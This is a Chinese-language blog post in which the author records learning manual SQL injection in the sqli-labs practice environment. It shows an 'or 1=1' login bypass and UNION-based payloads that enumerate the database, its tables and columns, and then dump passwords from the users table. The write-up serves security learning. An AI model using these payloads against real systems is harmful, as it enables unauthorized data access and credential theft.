
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title> - Hexo</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="
1sqli-lib这几天新学习了sql手动注入，对sql注入做了些许了解
首先是命令的了解和基础概念
1基础命令sql的基础语言从登录开始
select *     #查询命令from      ,"> 
    <meta name="author" content="John Doe"> 
    <link rel="alternative" href="atom.xml" title="Hexo" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content=" - Hexo"/>
    <meta name="twitter:description" content="
1sqli-lib这几天新学习了sql手动注入，对sql注入做了些许了解
首先是命令的了解和基础概念
1基础命令sql的基础语言从登录开始
select *     #查询命令from      ,"/>
    
    
    
    
    <meta property="og:site_name" content="Hexo"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content=" - Hexo"/>
    <meta property="og:description" content="
1sqli-lib这几天新学习了sql手动注入，对sql注入做了些许了解
首先是命令的了解和基础概念
1基础命令sql的基础语言从登录开始
select *     #查询命令from      ,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 6.1.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Hexo</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle"></h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title"></h1>
        <div class="stuff">
            <span>三月 24, 2022</span>
            

        </div>
        <div class="content markdown">
            <hr>
<h2 id="1"><a href="#1" class="headerlink" title="1"></a>1</h2><h1 id="sqli-lib"><a href="#sqli-lib" class="headerlink" title="sqli-lib"></a>sqli-lib</h1><p>这几天新学习了sql手动注入，对sql注入做了些许了解</p>
<p>首先是命令的了解和基础概念</p>
<h2 id="1基础命令"><a href="#1基础命令" class="headerlink" title="1基础命令"></a>1基础命令</h2><p>sql的基础语言从登录开始</p>
<p>select *     #查询命令<br>from          #自己的数据库名称<br>where        #条件<br>username&#x3D;‘’ and password&#x3D;‘ ’</p>
<p>以上就是对于登录数据库所需要的基础代码<br>其中可以通过or 1&#x3D;1 – 这一条命令来判定为真，从而注释掉后面的代码来达到进入数据库的目的<br>例如  where  username &#x3D;’’ or 1&#x3D;1 –  ‘and password &#x3D;’ ‘<br>因为– 注释掉了后面的内容，并且or 两边同时为假才为假，1&#x3D;1恒真，所以可以直接进入</p>
<h2 id="2数据库的应知道的名字名称"><a href="#2数据库的应知道的名字名称" class="headerlink" title="2数据库的应知道的名字名称"></a>2数据库的应知道的名字名称</h2><p>数据库中默认含有一个库 叫做information_schema 数据库，用来储存信息 其中它的表名分别有</p>
<p>schemata（数据库名）</p>
<p>tables（表名）</p>
<p>columns（列名或者是字段名）</p>
<p>这四个我们将会在练习中多次运用到</p>
<p>其中 schemata中有一个schema_name来存储数据库名</p>
<p>tables中有table_schema 和  table_name分别存储数据库名和表名</p>
<p>在我们查询中 会有 database(),user(),version()分别用来查询数据库，用户，和版本</p>
<p>注意：user这个并不是表名</p>
<h2 id="3sql注入的类型"><a href="#3sql注入的类型" class="headerlink" title="3sql注入的类型"></a>3sql注入的类型</h2><p>sql注入有两种类型  数字型和字符型</p>
<p>数字型表现为 id&#x3D;1</p>
<p>字符型表现为id&#x3D;1’</p>
<p>可通过修改对应的id值：正常数字，字符，反斜杠 来判断是否存在注入点</p>
<p>通过网页对我们操作的报错可以进行解读</p>
<p>如</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/zhaopian.img/main/sqli/%E6%8A%A5%E9%94%991.png" alt="panduan"></p>
<p>我们输入？id&#x3D;1‘</p>
<p>报错为 ’‘1’‘ limit 0.1 ’</p>
<p>将两边的‘’去除，则我们能发现  ‘1’‘ limit  说明我们的id是被’‘包围的，说明我们的id是字符串类型的，</p>
<p>再有</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/zhaopian.img/main/sqli/%E6%8A%A5%E9%94%992.png" alt="panduan"></p>
<p>此时出现’‘1’‘）limit 0.1’ </p>
<p>我们继续分解 ‘1’‘） limit </p>
<p>我们输入的id是1’那么我们的id是字符串型的且，需要一个）来注释掉前面的（，从而继续执行操作</p>
<p>至于查询操作我们先从库名到表名到表里的内容一次进行</p>
<p>这次我们使用union来进行操作</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/zhaopian.img/main/ku.png" alt="ku"></p>
<p>先查询库名  这个比较简单  ?id&#x3D;-1 union select 1,2, database() –+</p>
<p>能够得知我们的库名是security </p>
<p>我们拿到了库名就可以进行下一步操作，去看看库里有哪些表</p>
<p>?id&#x3D;-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema&#x3D;’security’ –+</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/zhaopian.img/main/table2.png" alt="table2"></p>
<p>从而得知库里的表有这几个，我们需要密码的和id那么我们进入user里面寻找</p>
<p>?id&#x3D;-1 union select 1,2, group_concat(column.name)from information_schema.columns  where table_name&#x3D;’users’ –+</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/zhaopian.img/main/table.png" alt="table"></p>
<p>如此，我们知道列表里有三种，最后直接查询密码即可</p>
<p>?id&#x3D;-1 union select 1,2, group_concat(password) from security.users –+</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/zhaopian.img/main/password.png" alt="password"></p>
<p>第三题看上文中对于报错的理解就可得知缺少） 所以在id&#x3D;1’) 基础上与第二题相差无几</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/zhaopian.img/main/sqli/%E6%9F%A5%E8%AF%A2%E7%BB%93%E6%9E%9C3.png" alt="jieguo3"></p>
<p>以上就是目前已经学习到的知识</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link"
		data-enable="false"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


    </div>
    
</div>


    </div>
</div>
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
